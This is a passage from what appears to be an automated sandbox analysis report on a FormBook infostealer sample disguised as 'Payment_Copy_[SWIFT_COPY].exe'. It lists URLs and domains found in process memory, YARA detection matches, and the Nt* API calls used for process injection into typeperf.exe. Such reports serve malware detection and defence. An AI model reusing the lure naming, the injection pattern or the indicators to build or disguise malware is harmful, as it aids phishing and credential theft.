            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmp, typeperf.exe, 00000006.00000003.1766828555.0000000007A0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: typeperf.exe, 00000006.00000003.1710170372.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10333
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: typeperf.exe, 00000006.00000002.3838152195.0000000000897000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.lets-room.online&rand=
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://rytrk.com/track.
            Source: typeperf.exe, 00000006.00000003.1715571233.0000000007954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: typeperf.exe, 00000006.00000003.1713297774.0000000007317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000049BE000.00000004.10000000.00040000.00000000.sdmp, typeperf.exe, 00000006.00000002.3842144841.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.0000000003FCE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.networksolutions.com/
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_lan
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land_h
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.lets-room.online&utm_medium=parking&utm_campaign=s_land
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.lets-room.online&utm_medium=parking&utm
            Source: typeperf.exe, 00000006.00000002.3840171693.0000000003D2E000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.000000000333E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.lets-room.online&amp;reg_source=parking_auto
            Source: typeperf.exe, 00000006.00000002.3840171693.00000000041E4000.00000004.10000000.00040000.00000000.sdmp, mNtjNwEeCHVoSqPJEzBvhXy.exe, 00000008.00000002.3839532271.00000000037F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Payment_Copy_[SWIFT_COPY].exe
            Sample has a suspicious name (potential lure to open the executable)
            Source: Payment_Copy_[SWIFT_COPY].exeStatic file information: Suspicious name
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A063 NtGetContextThread,4_2_0040A063
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A8A3 NtCreateSection,4_2_0040A8A3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A273 NtSetContextThread,4_2_0040A273
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040AAC3 NtMapViewOfSection,4_2_0040AAC3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040B393 NtDelayExecution,4_2_0040B393
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004283B3 NtClose,4_2_004283B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040ACF3 NtCreateFile,4_2_0040ACF3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040A483 NtResumeThread,4_2_0040A483
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00409E53 NtSuspendThread,4_2_00409E53
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040AF23 NtReadFile,4_2_0040AF23
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040B7B3 NtAllocateVirtualMemory,4_2_0040B7B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92B60 NtClose,LdrInitializeThunk,4_2_00B92B60
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00B92C70
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00B92DF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B935C0 NtCreateMutant,LdrInitializeThunk,4_2_00B935C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B94340 NtSetContextThread,4_2_00B94340
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B94650 NtSuspendThread,4_2_00B94650
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92AB0 NtWaitForSingleObject,4_2_00B92AB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92AF0 NtWriteFile,4_2_00B92AF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92AD0 NtReadFile,4_2_00B92AD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92BA0 NtEnumerateValueKey,4_2_00B92BA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92B80 NtQueryInformationFile,4_2_00B92B80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92BF0 NtAllocateVirtualMemory,4_2_00B92BF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92BE0 NtQueryValueKey,4_2_00B92BE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92CA0 NtQueryInformationToken,4_2_00B92CA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92CF0 NtOpenProcess,4_2_00B92CF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92CC0 NtQueryVirtualMemory,4_2_00B92CC0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92C00 NtQueryInformationProcess,4_2_00B92C00
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92C60 NtCreateKey,4_2_00B92C60
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92DB0 NtEnumerateKey,4_2_00B92DB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92DD0 NtDelayExecution,4_2_00B92DD0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92D30 NtUnmapViewOfSection,4_2_00B92D30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92D10 NtMapViewOfSection,4_2_00B92D10
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92D00 NtSetInformationFile,4_2_00B92D00
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92EA0 NtAdjustPrivilegesToken,4_2_00B92EA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92E80 NtReadVirtualMemory,4_2_00B92E80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92EE0 NtQueueApcThread,4_2_00B92EE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92E30 NtWriteVirtualMemory,4_2_00B92E30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92FB0 NtResumeThread,4_2_00B92FB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92FA0 NtQuerySection,4_2_00B92FA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92F90 NtProtectVirtualMemory,4_2_00B92F90
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92FE0 NtCreateFile,4_2_00B92FE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92F30 NtCreateSection,4_2_00B92F30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B92F60 NtCreateProcessEx,4_2_00B92F60
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B93090 NtSetValueKey,4_2_00B93090
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B93010 NtOpenDirectoryObject,4_2_00B93010
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B939B0 NtGetContextThread,4_2_00B939B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B93D10 NtOpenProcessToken,4_2_00B93D10
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B93D70 NtOpenThread,4_2_00B93D70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03034340 NtSetContextThread,LdrInitializeThunk,6_2_03034340
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03034650 NtSuspendThread,LdrInitializeThunk,6_2_03034650
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032B60 NtClose,LdrInitializeThunk,6_2_03032B60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03032BA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03032BE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03032BF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032AD0 NtReadFile,LdrInitializeThunk,6_2_03032AD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032AF0 NtWriteFile,LdrInitializeThunk,6_2_03032AF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032F30 NtCreateSection,LdrInitializeThunk,6_2_03032F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032FB0 NtResumeThread,LdrInitializeThunk,6_2_03032FB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032FE0 NtCreateFile,LdrInitializeThunk,6_2_03032FE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03032E80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03032EE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03032D10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03032D30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032DD0 NtDelayExecution,LdrInitializeThunk,6_2_03032DD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03032DF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032C60 NtCreateKey,LdrInitializeThunk,6_2_03032C60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03032C70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03032CA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030335C0 NtCreateMutant,LdrInitializeThunk,6_2_030335C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030339B0 NtGetContextThread,LdrInitializeThunk,6_2_030339B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032B80 NtQueryInformationFile,6_2_03032B80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032AB0 NtWaitForSingleObject,6_2_03032AB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032F60 NtCreateProcessEx,6_2_03032F60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032F90 NtProtectVirtualMemory,6_2_03032F90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032FA0 NtQuerySection,6_2_03032FA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032E30 NtWriteVirtualMemory,6_2_03032E30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032EA0 NtAdjustPrivilegesToken,6_2_03032EA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032D00 NtSetInformationFile,6_2_03032D00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032DB0 NtEnumerateKey,6_2_03032DB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032C00 NtQueryInformationProcess,6_2_03032C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032CC0 NtQueryVirtualMemory,6_2_03032CC0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03032CF0 NtOpenProcess,6_2_03032CF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03033010 NtOpenDirectoryObject,6_2_03033010
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03033090 NtSetValueKey,6_2_03033090
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03033D10 NtOpenProcessToken,6_2_03033D10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03033D70 NtOpenThread,6_2_03033D70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_00704CA0 NtCreateFile,6_2_00704CA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_00704DD0 NtReadFile,6_2_00704DD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_00704E90 NtDeleteFile,6_2_00704E90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_00704F10 NtClose,6_2_00704F10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_00705040 NtAllocateVirtualMemory,6_2_00705040
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_004063540_2_00406354
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_004048020_2_00404802
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00406B2B0_2_00406B2B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004278B72_2_004278B7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0041C0162_2_0041C016
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040E8292_2_0040E829
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0041B89A2_2_0041B89A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040C9E92_2_0040C9E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040C19C2_2_0040C19C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_00427AFD2_2_00427AFD
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040BB502_2_0040BB50
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0041B32A2_2_0041B32A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0041D43D2_2_0041D43D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040BCA82_2_0040BCA8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040C5B42_2_0040C5B4
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0041ADBA2_2_0041ADBA
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040B64C2_2_0040B64C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_0040CE1E2_2_0040CE1E
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 2_2_004146F32_2_004146F3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004011404_2_00401140
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004101334_2_00410133
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004031854_2_00403185
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004031904_2_00403190
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040E1B14_2_0040E1B1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040E1B34_2_0040E1B3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004012704_2_00401270
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004163F34_2_004163F3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00402DD34_2_00402DD3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00402DE04_2_00402DE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0040FF134_2_0040FF13
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_004027204_2_00402720
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_0042A7234_2_0042A723
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF20004_2_00BF2000
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C181CC4_2_00C181CC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C141A24_2_00C141A2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C201AA4_2_00C201AA
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFA1184_2_00BFA118
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B501004_2_00B50100
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE81584_2_00BE8158
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BE02C04_2_00BE02C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C002744_2_00C00274
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C203E64_2_00C203E6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6E3F04_2_00B6E3F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1A3524_2_00C1A352
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0E4F64_2_00C0E4F6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C124464_2_00C12446
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C044204_2_00C04420
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C205914_2_00C20591
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B605354_2_00B60535
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7C6E04_2_00B7C6E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5C7C04_2_00B5C7C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B607704_2_00B60770
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B847504_2_00B84750
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B468B84_2_00B468B8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B8E8F04_2_00B8E8F0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B628404_2_00B62840
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6A8404_2_00B6A840
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B629A04_2_00B629A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C2A9A64_2_00C2A9A6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B769624_2_00B76962
